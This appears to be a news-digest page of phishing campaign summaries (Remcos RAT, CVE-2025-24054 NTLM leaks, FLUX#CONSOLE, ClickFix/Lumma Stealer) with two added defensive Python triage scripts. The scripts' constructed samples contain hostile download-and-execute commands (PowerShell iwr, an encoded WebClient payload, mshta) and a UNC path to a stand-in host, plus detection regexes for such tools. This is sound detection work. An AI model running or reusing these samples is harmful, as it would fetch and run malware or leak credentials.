phishing email

Winsage
May 4, 2025
Microsoft has warned about the increasing use of PDF attachments in cyberattacks, particularly during the U.S. tax season. Attackers embed links in PDFs that redirect users to counterfeit pages, such as a fake DocuSign site. Trustwave SpiderLabs has identified a new campaign in which a fake SWIFT payment copy leads to a malicious PDF containing obfuscated JavaScript; that JavaScript downloads a script which conceals the Remcos RAT payload using steganography, hiding the payload inside image files so that it passes content inspection as an ordinary picture. The chain therefore starts with a phishing email carrying a malicious PDF, proceeds through a hostile web page and ends with the delivery of Remcos RAT, a trojan that gives the operator remote control of the compromised system. Users are advised to treat emails labeled “SWIFT Copy” as suspicious and to delete them rather than open the attachment.
Winsage
April 19, 2025
A Windows vulnerability, CVE-2025-24054, is being exploited in phishing campaigns targeting government and private organizations. Initially considered low-risk and not known to be exploited, it was patched in Microsoft's March 2025 Patch Tuesday updates. Shortly after the patches shipped, Check Point observed a rise in exploitation attempts, some of which it linked to the Russian group APT28. Attackers sent phishing emails with Dropbox links to archives containing .library-ms files; when Windows Explorer handles such a file, it connects to an external SMB server controlled by the attackers, which captures the victim's NTLM authentication hash for offline cracking or relay. A later wave delivered the .library-ms files as direct attachments, where little more than viewing the file in Explorer is enough to trigger the flaw. The malicious ZIP archive also contained files that trigger older NTLM hash-leak vulnerabilities, so patching CVE-2025-24054 alone does not close the exposure. Check Point published the IP addresses of the attacker-controlled SMB servers as indicators. Although classified as medium severity, the impact of harvested domain credentials is significant; organizations should apply the March 2025 updates and disable NTLM authentication wherever it is not required.
Winsage
April 17, 2025
A Windows vulnerability, CVE-2025-24054, is being actively exploited in phishing campaigns targeting the government and private sectors. It was fixed in Microsoft's March 2025 Patch Tuesday, at which point it was not considered actively exploited. Check Point researchers reported increased exploitation shortly after the patches were released, particularly between March 20 and 25, 2025. Some activity was linked to the Russian state-sponsored group APT28, but definitive attribution is lacking. The vulnerability lets attackers capture NTLM hashes through phishing emails containing crafted .library-ms files that point at an attacker-controlled SMB server; the flaw fires as soon as Explorer handles the file. Check Point noted that later attacks sent the .library-ms files directly as attachments, requiring minimal user interaction. The archives also included components that exploit older NTLM hash-leak vulnerabilities. The attacker-controlled SMB servers were traced to specific IP addresses. Although rated medium severity, a captured NTLM hash can be cracked offline or relayed to authenticate as the victim, which opens the way to lateral movement and privilege escalation; organizations are advised to install the updates and disable NTLM authentication where it is not necessary.
Winsage
December 17, 2024
The Securonix Threat Research team has identified a phishing campaign, dubbed FLUX#CONSOLE, that uses tax-themed lures and Microsoft Common Console Document (.msc) files to deliver a backdoor. The attack begins with a phishing email carrying a file titled “Income-Tax-Deduction-and-Rebates202441712.pdf” which is actually an MSC file dressed up as a PDF. The campaign combines several tactics: tax-themed lures, abuse of MSC files as a launcher, DLL sideloading via Dism.exe, persistence through scheduled tasks and heavy obfuscation. When the victim opens the disguised MSC file, commands embedded in its console XML download or extract a malicious DLL named DismCore.dll, which is then sideloaded by the legitimate Dism.exe. The malware communicates with a command-and-control server at hxxps://siasat[.]top, exfiltrating data over encrypted HTTPS. The attackers maintained access for about 24 hours and targeted victims in Pakistan. The tradecraft does not match any known advanced persistent threat group, but the campaign underlines the growing use of MSC files as a malware delivery vehicle. Indicators of compromise include the C2 domain siasat[.]top and the hashes of the analyzed files.
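As an added example (not code from Winsage, Check Point or Securonix), the following Python script triages the two XML-based attachment types described in the CVE-2025-24054 entries above and in this FLUX#CONSOLE entry: it extracts the UNC hosts that a .library-ms file would make Explorer contact over SMB, and flags command strings and URLs inside an .msc console file. The sample files, the 203.0.113.10 address and the file names in it are constructed for the example; the .msc sample follows MMC's taskpad task layout, but the scanner walks every text node and attribute value and does not depend on that layout.

```python
r"""Scan XML-based phishing attachments (.library-ms, .msc) for hostile content.

Added example; not code from Winsage, Check Point or Securonix. Both attachment
types are plain XML, so one parser serves both:
  .library-ms  Windows Library description: a <url> holding a UNC path (\\host\share)
               makes Explorer contact that host over SMB, which is how the NTLM hash leaks.
  .msc         MMC console file: a taskpad task can carry a command line for MMC to run.
The sample files below are constructed (203.0.113.10 is a documentation address,
not a live indicator). The scanner walks every text node and attribute value, so it
does not depend on the exact .msc schema.
"""
import re
import xml.etree.ElementTree as ET

# \\host\share : two leading backslashes, a host, then a path separator.
UNC_RE = re.compile(r"^\\\\([^\\/]+)[\\/]")

# Strings that have no place in a benign console file or library description.
SUSPICIOUS_RE = re.compile(
    r"(powershell|pwsh|cmd\.exe|mshta|rundll32|regsvr32|dism\.exe|certutil"
    r"|https?://|\\\\[^\\]+\\)",
    re.IGNORECASE,
)


def _local(tag):
    """Drop the XML namespace: '{ns}url' -> 'url'."""
    return tag.rsplit("}", 1)[-1]


def _text_nodes(root):
    """Yield (element path, text) for every non-empty text node and attribute value."""
    def walk(el, path):
        here = path + "/" + _local(el.tag)
        if el.text and el.text.strip():
            yield here, el.text.strip()
        for key, value in el.attrib.items():
            if value.strip():
                yield here + "@" + key, value.strip()
        for child in el:
            yield from walk(child, here)
    yield from walk(root, "")


def unc_hosts_in_library(xml_text):
    """Hosts that opening this .library-ms file would make Explorer connect to."""
    hosts = []
    for path, text in _text_nodes(ET.fromstring(xml_text)):
        if path.endswith("/url"):
            match = UNC_RE.match(text)
            if match:
                hosts.append(match.group(1))
    return hosts


def suspicious_strings(xml_text):
    """(element path, text) pairs anywhere in the XML that match SUSPICIOUS_RE."""
    return [(p, t) for p, t in _text_nodes(ET.fromstring(xml_text))
            if SUSPICIOUS_RE.search(t)]


def triage(filename, xml_text):
    """Verdict for one attachment: ('block' | 'review' | 'allow', evidence)."""
    name = filename.lower()
    if name.endswith(".library-ms"):
        hosts = unc_hosts_in_library(xml_text)
        return ("block" if hosts else "allow", hosts)
    if name.endswith(".msc"):
        hits = suspicious_strings(xml_text)
        # A console file arriving by e-mail is rarely legitimate even when clean.
        return ("block" if hits else "review", hits)
    return ("review", [])


# --- constructed samples -------------------------------------------------------
LIBRARY_MS_UNC = r"""<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <name>@shell32.dll,-34575</name>
  <version>6</version>
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <isDefaultSaveLocation>true</isDefaultSaveLocation>
      <simpleLocation><url>\\203.0.113.10\shared</url></simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>"""

LIBRARY_MS_BENIGN = r"""<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <name>@shell32.dll,-34575</name>
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <simpleLocation><url>knownfolder:{FDD39AD0-238F-46AF-ADB4-6C85480369C7}</url></simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>"""

MSC_TASKPAD = r"""<MMC_ConsoleFile ConsoleVersion="3.0" ProgramMode="UserSDI">
  <StringTables><StringTable><Strings>
    <String ID="1" Refs="1">Console Root</String>
    <String ID="2" Refs="1">Income-Tax-Deduction-and-Rebates</String>
  </Strings></StringTable></StringTables>
  <ConsoleTaskpads><ConsoleTaskpad ID="{1B3A6F4E-0000-4000-8000-000000000001}">
    <Tasks><Task Type="CommandLine">
      <Command>cmd.exe</Command>
      <Parameters>/c powershell -w hidden -c "iwr https://203.0.113.10/DismCore.dll -OutFile $env:TEMP\DismCore.dll"</Parameters>
    </Task></Tasks>
  </ConsoleTaskpad></ConsoleTaskpads>
</MMC_ConsoleFile>"""

MSC_BENIGN = r"""<MMC_ConsoleFile ConsoleVersion="3.0" ProgramMode="UserSDI">
  <StringTables><StringTable><Strings>
    <String ID="1" Refs="1">Console Root</String>
    <String ID="2" Refs="1">Event Viewer (Local)</String>
  </Strings></StringTable></StringTables>
</MMC_ConsoleFile>"""

if __name__ == "__main__":
    for name, xml in [("SWIFT_Copy.library-ms", LIBRARY_MS_UNC),
                      ("Documents.library-ms", LIBRARY_MS_BENIGN),
                      ("Income-Tax-Rebates.pdf.msc", MSC_TASKPAD),
                      ("eventvwr.msc", MSC_BENIGN)]:
        print(name, *triage(name, xml))
```

A mail gateway or EDR rule would call triage() on any attachment with these extensions. A clean .msc still comes back as "review" because a console file arriving by e-mail has almost no legitimate use, whereas a .library-ms whose only locations are known folders is what a real Windows library looks like and is allowed.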
Winsage
November 12, 2024
Threat actors have reworked the Remcos remote access tool into a more evasive variant that chains several layers of scripting languages to avoid detection. The campaign exploits a known remote code execution vulnerability in unpatched Microsoft Office and WordPad installations and starts with a phishing email carrying a disguised Excel file. The malware uses multiple encoding and obfuscation layers, including PowerShell scripts and API hooking, to frustrate analysis, then collects information from the victim's device and sends it to a command-and-control server. Experts stress patching, employee training and robust endpoint protection as the defenses against such attacks.
Winsage
October 23, 2024
A security flaw, CVE-2024-8260, was discovered in Styra's Open Policy Agent (OPA) by researchers at Tenable. The vulnerability, with a CVSS score of 6.1, can expose the NTLM credentials of Windows users who run OPA. It is triggered by passing OPA a path in Universal Naming Convention (UNC) form (\\server\share) that points at a server the attacker controls; Windows then authenticates to that server and leaks the user's NTLM hash. Organizations using the OPA CLI or the OPA Go package on Windows are advised to update to OPA v0.68.0. Exploitation can occur through social engineering, for example by persuading a user to run OPA against a malicious file attachment, and Rego rules can likewise be used to redirect OPA's communications to the attacker's host. Because Windows sends an NTLM response whenever it accesses a remote share, the attacker can relay the leaked authentication or crack the credentials to reach other systems. The risk is greater where a vulnerable OPA server accepts input from users or third parties, as is common in cloud-native applications that evaluate dynamic input.
Winsage
September 20, 2024
Many GitHub users received a phishing email impersonating GitHub's security team, warning of vulnerabilities in their repositories and directing them to a malicious link. The link led to a fake CAPTCHA page that used the ClickFix pattern: the victim is told to press the Windows key and R to open the Run prompt, press CTRL and V to paste a command the page has already placed on the clipboard, and press Enter. That runs a PowerShell command which downloads a file named “l6e.exe”, the Lumma Stealer, which harvests stored credentials. Microsoft advises against disabling PowerShell outright, since system processes depend on it, and notes that tightening its configuration is not trivial.
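The Run-dialog sequence above (Win+R, Ctrl+V, Enter) leaves a trace on the victim's machine that an incident responder can triage. The script below is an added example, not code from Winsage, GitHub or Microsoft: it takes Run-history entries shaped like the RunMRU registry key, scores each for ClickFix indicators, and decodes a -EncodedCommand argument so the hidden PowerShell becomes readable. The dictionary of entries, the 203.0.113.10 address and the payload text are constructed for this example; on a live host the values would be read from the registry instead.

```python
r"""Triage Windows Run-dialog history for ClickFix-style PowerShell one-liners.

Added example; not code from Winsage, GitHub or Microsoft. The Run dialog records
what was executed under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU:
one value per entry (a, b, c, ...) whose data ends in a literal "\1", plus an MRUList
value giving the order, most recent first. SAMPLE_RUNMRU below is a constructed
stand-in for those values (read them with winreg on a live host); 203.0.113.10 is a
documentation address, not a live indicator.
"""
import base64
import re

INDICATORS = {
    "powershell":         re.compile(r"\b(powershell(\.exe)?|pwsh)\b", re.I),
    "hidden-window":      re.compile(r"-w(indowstyle)?\s+h(idden)?\b", re.I),
    "exec-policy-bypass": re.compile(r"-e(xecutionpolicy|p)\s+bypass\b", re.I),
    "encoded-command":    re.compile(r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{16,}", re.I),
    "download-cradle":    re.compile(r"\b(iwr|invoke-webrequest|downloadstring|downloadfile"
                                     r"|curl|wget|bitsadmin|certutil)\b", re.I),
    "invoke-expression":  re.compile(r"\b(iex|invoke-expression)\b", re.I),
    "mshta":              re.compile(r"\bmshta(\.exe)?\b", re.I),
    "url":                re.compile(r"https?://", re.I),
}
ENCODED_RE = re.compile(r"-e(?:nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)


def decode_encoded_command(command):
    """Plaintext of a -EncodedCommand argument (base64 of UTF-16LE), or None."""
    match = ENCODED_RE.search(command)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):   # binascii.Error is a ValueError
        return None


def analyse(command):
    """Indicator names that fire on the command or on its decoded payload."""
    decoded = decode_encoded_command(command)
    indicators = [name for name, rx in INDICATORS.items()
                  if rx.search(command) or (decoded and rx.search(decoded))]
    return {"command": command, "decoded": decoded, "indicators": indicators}


def triage_runmru(values):
    """Walk RunMRU values in MRU order (most recent first); one analysis per entry."""
    order = values.get("MRUList", "")
    names = list(order) + sorted(k for k in values if k != "MRUList" and k not in order)
    results = []
    for name in names:
        data = values[name]
        if data.endswith("\\1"):          # RunMRU stores the data with a "\1" suffix
            data = data[:-2]
        entry = analyse(data)
        entry["value_name"] = name
        results.append(entry)
    return results


# --- constructed sample, shaped like a RunMRU export ---------------------------
PAYLOAD_PLAINTEXT = ("(New-Object Net.WebClient).DownloadFile("
                     "'http://203.0.113.10/l6e.exe', \"$env:TEMP\\l6e.exe\"); "
                     "Start-Process \"$env:TEMP\\l6e.exe\"")
ENCODED_PAYLOAD = base64.b64encode(PAYLOAD_PLAINTEXT.encode("utf-16-le")).decode("ascii")

SAMPLE_RUNMRU = {
    "MRUList": "cab",
    "a": "powershell -w hidden -ep bypass -enc " + ENCODED_PAYLOAD + "\\1",
    "b": "notepad\\1",
    "c": "mshta https://203.0.113.10/captcha.hta\\1",
}

if __name__ == "__main__":
    for entry in triage_runmru(SAMPLE_RUNMRU):
        print(entry["value_name"], entry["indicators"])
        if entry["decoded"]:
            print("   decoded:", entry["decoded"])
```

On a live host the only change is to read the values from the RunMRU key of every user profile (winreg, or an exported hive). The same indicators apply to PowerShell script block logs (Event ID 4104), where the decoded command also appears, which is the better place to look if the Run history has been cleared.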
Winsage
July 28, 2024
A surge of cybercriminal activity has followed the CrowdStrike outage, leading to an increase in social engineering attacks targeting the vendor's clients. National cybersecurity agencies in the US, UK, Canada, and Australia have reported a rise in phishing attempts, with daily attacks ranging from 150 to 300, significantly higher than typical volumes. Cybercriminals are exploiting the outage by impersonating CrowdStrike and offering technical support, targeting organizations directly affected by the incident. Over 2,000 phishing and typosquatting domains related to CrowdStrike have been registered, which may be used for malware distribution. Specific attacks have included a ZIP file containing HijackLoader and a phishing email with a malicious PDF attachment that installed a wiper. Organizations are advised to enhance their defenses by using blocklists and protective DNS tools and to seek support only from official CrowdStrike channels.
Winsage
July 24, 2024
The attack chain begins with a phishing email containing a malicious link that downloads an LNK file; the LNK runs an HTA script that decodes the next-stage payload. Two types of shellcode injectors then inject the final stealer into legitimate processes. The stealer targets a range of applications and is tailored to specific regions. Applying Microsoft's latest security updates is essential to block CVE-2024-21412, the Windows SmartScreen security feature bypass that this chain relies on.